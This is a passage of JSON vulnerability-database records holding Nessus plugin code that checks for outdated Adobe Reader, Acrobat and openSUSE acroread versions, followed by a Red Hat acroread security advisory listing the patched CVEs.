value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-cmaps-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ja-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-ko-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_CN-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"acroread-fonts-zh_TW-9.3.4-0.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-cmaps / acroread-fonts-ja / acroread-fonts-ko / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:13:03", "description": "The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.3.4 / 8.2.4. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - Multiple vulnerabilities in the bundled Flash\n Player as noted in APSB10-16. (CVE-2010-0209,\n CVE-2010-2188, CVE-2010-2213, CVE-2010-2214,\n CVE-2010-2215, CVE-2010-2216)\n\n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - An integer overflow vulnerability could lead to\n code execution. (CVE-2010-2862)", "edition": 26, "published": "2010-08-19T00:00:00", "title": "Adobe Acrobat < 9.3.4 / 8.2.4 Multiple Vulnerabilities (APSB10-17)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "ADOBE_ACROBAT_APSB10-17.NASL", "href": "https://www.tenable.com/plugins/nessus/48374", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48374);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_xref(name:\"Secunia\", value:\"40766\");\n script_xref(name:\"Secunia\", value:\"40907\");\n\n script_name(english:\"Adobe Acrobat < 9.3.4 / 8.2.4 Multiple Vulnerabilities (APSB10-17)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_cve_id(\n \"CVE-2010-0209\",\n \"CVE-2010-1240\",\n \"CVE-2010-2188\",\n \"CVE-2010-2213\",\n \"CVE-2010-2214\",\n \"CVE-2010-2215\",\n \"CVE-2010-2216\",\n \"CVE-2010-2862\"\n );\n script_bugtraq_id(39109, 40798, 42203, 42358, 42361, 42362, 42363, 42364);\n\n script_set_attribute(attribute:\"synopsis\",value:\n\"The version of Adobe Acrobat on the remote Windows host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.3.4 / 8.2.4. Such versions are reportedly affected by multiple\nvulnerabilities :\n\n - Multiple vulnerabilities in the bundled Flash\n Player as noted in APSB10-16. (CVE-2010-0209,\n CVE-2010-2188, CVE-2010-2213, CVE-2010-2214,\n CVE-2010-2215, CVE-2010-2216)\n\n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - An integer overflow vulnerability could lead to\n code execution. (CVE-2010-2862)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://securityevaluators.com/knowledge/papers/CrashAnalysis.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-16.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-17.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 9.3.4 / 8.2.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe PDF Escape EXE Social Engineering (No JavaScript)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/19\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_dependencies('adobe_acrobat_installed.nasl');\n script_require_keys('SMB/Acrobat/Version');\n exit(0);\n}\n\n\ninclude('global_settings.inc');\n\nversion = get_kb_item('SMB/Acrobat/Version');\nif (isnull(version)) exit(1, \"The 'SMB/Acrobat/Version' KB item is missing.\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif ( \n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 4) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 4)\n)\n{\n if (report_verbosity > 0)\n {\n path = get_kb_item('SMB/Acrobat/Path');\n if (isnull(path)) path = 'n/a';\n\n report =\n '\\n Product : Adobe Acrobat'+\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 9.3.4 / 8.2.4\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n}\nelse exit(0, \"The host is not affected since Adobe Acrobat \"+version_report+\" is installed.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:14:25", "description": "The version of Adobe Reader installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. Such versions are reportedly affected by multiple\nvulnerabilities :\n \n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2212)", "edition": 25, "published": "2010-06-30T00:00:00", "title": "Adobe Reader < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB10-15.NASL", "href": "https://www.tenable.com/plugins/nessus/47165", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47165);\n script_version(\"1.54\");\n script_cvs_date(\"Date: 2018/09/17 21:46:53\");\n\n script_xref(name:\"Secunia\", value:\"40034\");\n\n script_name(english:\"Adobe Reader < 9.3.3 / 8.2.3 Multiple Vulnerabilities (APSB10-15)\");\n script_summary(english:\"Checks version of Adobe Reader\");\n\n script_cve_id(\n \"CVE-2010-1240\",\n \"CVE-2010-1285\",\n \"CVE-2010-1295\",\n \"CVE-2010-1297\",\n \"CVE-2010-2168\",\n \"CVE-2010-2201\",\n \"CVE-2010-2202\",\n \"CVE-2010-2204\",\n \"CVE-2010-2205\",\n \"CVE-2010-2206\",\n \"CVE-2010-2207\",\n \"CVE-2010-2208\",\n \"CVE-2010-2209\",\n \"CVE-2010-2210\",\n \"CVE-2010-2211\",\n \"CVE-2010-2212\"\n );\n script_bugtraq_id(\n 39109,\n 40586,\n 41230,\n 41231,\n 41232,\n 41234,\n 41236,\n 41237,\n 41238,\n 41239,\n 41240,\n 41241,\n 41242,\n 41243,\n 41244,\n 41245\n );\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\",value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 9.3.3 / 8.2.3. Such versions are reportedly affected by multiple\nvulnerabilities :\n \n - A social engineering attack could lead to code \n execution. (CVE-2010-1240)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-1285)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-1295)\n\n - A memory corruption vulnerability could lead to code\n execution. This issue is reportedly being exploited in\n the wild. (CVE-2010-1297)\n\n - Handling of an invalid pointer could lead to code \n execution. (CVE-2010-2168)\n\n - Handling of an invalid pointer could lead to code\n execution. (CVE-2010-2201)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2202)\n\n - A denial of service vulnerability could potentially lead\n to code execution. (CVE-2010-2204)\n\n - It may be possible to execute arbitrary code via \n uninitialized memory locations. (CVE-2010-2205)\n\n - An error in array-indexing could lead to code \n execution. (CVE-2010-2206)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2207)\n \n - Dereferencing a deleted heap object could lead to code\n execution. (CVE-2010-2208)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2209)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2210)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2211)\n\n - A memory corruption vulnerability could lead to code\n execution. (CVE-2010-2212)\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-15.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Reader 9.3.3 / 8.2.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-164\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player \"newfunction\" Invalid Pointer Use');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies('adobe_reader_installed.nasl');\n script_require_keys('SMB/Acroread/Version');\n exit(0);\n}\n\n#\n\ninclude('global_settings.inc');\n\ninfo = '';\ninfo2 = '';\nvuln = 0;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) exit(0, 'The \"SMB/Acroread/Version\" KB list is missing.');\n\nforeach version (vers)\n{\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n path = get_kb_item('SMB/Acroread/'+version+'/Path');\n if (isnull(path)) path = 'n/a';\n\n verui = get_kb_item('SMB/Acroread/'+version+'/Version_UI');\n if (isnull(verui)) verui = version;\n\n if ( \n ver[0] < 8 ||\n (ver[0] == 8 && ver[1] < 2) ||\n (ver[0] == 8 && ver[1] == 2 && ver[2] < 3) ||\n (ver[0] == 9 && ver[1] < 3) ||\n (ver[0] == 9 && ver[1] == 3 && ver[2] < 3)\n )\n {\n vuln++;\n info += '\\n Path : '+path+\n '\\n Installed version : '+verui+\n '\\n Fixed version : 9.3.3 / 8.2.3\\n';\n }\n else\n info2 += \" and \" + verui;\n}\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n'+\n info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n\n exit(0);\n}\n\nif (info2) \n{\n info2 -= \" and \";\n if (\" and \" >< info2) be = \"are\";\n else be = \"is\";\n\n exit(0, \"The host is not affected since Adobe Reader \"+info2+\" \"+be+\" installed.\");\n}\nelse exit(1, \"Unexpected error - 'info2' is empty.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:49", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1240", "CVE-2010-1285", "CVE-2010-1295", "CVE-2010-1297", "CVE-2010-2168", "CVE-2010-2201", "CVE-2010-2202", "CVE-2010-2203", "CVE-2010-2204", "CVE-2010-2205", "CVE-2010-2206", "CVE-2010-2207", "CVE-2010-2208", "CVE-2010-2209", "CVE-2010-2210", "CVE-2010-2211", "CVE-2010-2212"], "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes multiple vulnerabilities in Adobe Reader. These\nvulnerabilities are detailed on the Adobe security pages APSA10-01 and\nAPSB10-15, listed in the References section. A specially-crafted PDF file\ncould cause Adobe Reader to crash or, potentially, execute arbitrary code\nas the user running Adobe Reader when opened. (CVE-2010-1240,\nCVE-2010-1285, CVE-2010-1295, CVE-2010-1297, CVE-2010-2168, CVE-2010-2201,\nCVE-2010-2202, CVE-2010-2203, CVE-2010-2204, CVE-2010-2205, CVE-2010-2206,\nCVE-2010-2207, CVE-2010-2208, CVE-2010-2209, CVE-2010-2210, CVE-2010-2211,\nCVE-2010-2212)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 9.3.3, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\n", "modified": "2017-09-08T12:06:51", "published": "2010-06-30T04:00:00", "id": "RHSA-2010:0503", "href": "https://access.redhat.com/errata/RHSA-2010:0503", "type": "redhat", "title": "(RHSA-2010:0503) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
